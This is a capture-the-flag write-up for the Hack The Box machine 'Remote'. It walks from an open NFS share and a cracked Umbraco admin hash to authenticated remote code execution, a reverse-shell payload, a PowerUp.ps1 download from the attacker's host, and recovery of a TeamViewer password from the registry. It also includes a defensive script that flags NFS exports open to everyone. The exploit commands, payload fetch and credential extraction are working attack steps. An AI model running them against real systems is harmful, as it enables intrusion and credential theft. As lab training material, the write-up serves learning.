Remote is an easy Windows machine from Hack The Box.
Let's get started with the result of the nmap scan.
On port 80 there was an HTTP server running.
When I navigated through the pages I found some names which could be potential usernames.
I thought of brute forcing these usernames on the SMB service.
In parallel I also started gobuster and got the output below.
From the /umbraco page I got a login page
I tried basic SQL injection but it was not working.
Here I got introduced to Umbraco CMS. Straight away I googled for an Umbraco exploit.
But I was not sure about the version running, and the exploit also needed some admin credentials.
Later, when I examined the nmap results, I saw port 111. So there is a possibility of RPC services like nfs, nlockmgr etc.
I tried to check it using the showmount command.
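From the defender's side, the same showmount -e listing can be audited for exports that any client may mount. This is an added example, not part of the original write-up; the host name, paths and listing are constructed sample data, and the function names are hypothetical.

```shell
#!/bin/sh
# Flag NFS exports that any client may mount.
# Input: `showmount -e <server>` output on stdin.
# Output: one line per open export, "<path> <client-spec>".
# Assumption: export paths contain no whitespace.
flag_open_exports() {
    awk '
        NR == 1 && /^Export list/ { next }   # skip the header line
        NF >= 2 {
            path = $1
            # Everything after the path is the comma-separated client list.
            clients = $0
            sub(/^[^ \t]+[ \t]+/, "", clients)
            n = split(clients, c, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+|[ \t]+$/, "", c[i])
                # "(everyone)" is printed when no client restriction is set,
                # "*" and 0.0.0.0/0 are explicit wildcards.
                if (c[i] == "(everyone)" || c[i] == "*" || c[i] == "0.0.0.0/0")
                    print path, c[i]
            }
        }
    '
}

# Constructed sample listing (not taken from the machine in this write-up).
sample_showmount() {
cat <<'EOF'
Export list for nfs.example.internal:
/srv/backups   (everyone)
/srv/projects  10.20.0.0/24,10.20.1.5
/srv/public    *
EOF
}

# Stand-alone run on the sample; in practice: showmount -e <server> | flag_open_exports
sample_showmount | flag_open_exports
```

Any export it reports should either be restricted to named hosts or subnets, or be checked for backups, configuration files and database files that should not be readable without authentication.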
Let's enumerate this backup!!
From this list I decided to investigate web.config for possible passwords.
I was not able to locate any useful password. But I got a file named
Umbraco.sdf
Using the find command I located the file, and using the strings command I was able to find the admin hash.
adminadmin@htb.local
hash : b8be16afba8c314ad33d812f22a04991b90e2aaa
By using john I was able to decrypt the password in no time.
The password is baconandcheese
I tried to log in to the Umbraco portal with these credentials.
I just confirmed the Umbraco version v7.12.4
A customised exploit for the CVE was found on GitHub:
https://github.com/noraj/Umbraco-RCE
I was able to do RCE. In the below example I executed the 'systeminfo' command.
python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command systeminfo'
I uploaded a payload which can connect back to my attacker machine using msfvenom
I was able to upload it through CMS dashboard
I was able to locate the shell I uploaded
Now it was time to execute it and obtain the shell.
python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command C:/inetpub/wwwroot/media/1038/ehackify.exe'
Within no time I got the shell.
I downloaded PowerUp.ps1 to the target machine for enumerating privilege escalation.
invoke-webrequest -Uri http://10.10.14.195/Powerup.ps1 -outfile p.ps1
It's possible to abuse the UsoSvc service at C:\Windows\system32\svchost.exe
I also ran winPEAS.exe
and I was able to learn that TeamViewer was running.
I decided to proceed without Metasploit.
I navigated to the TeamViewer file location and executed the commands below for extracting the password.
Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7
I was able to read the SecurityPasswordAES with the below command:
(New-Object -ComObject WScript.Shell).RegRead("HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES")
These numbers are base-10 integers and we have to convert them to base 16.
From GitHub I was able to find a script to decrypt this and I got the password as
!R3m0te!
Next is to login as administrator with this password.
I used Evil-WinRM to log in.
System Compromised!
If you found this write up useful, you can respect me on hackthebox
https://www.hackthebox.eu/home/users/profile/240146
You can connect with me on
LinkedIn: Derick N
Twitter: Derick N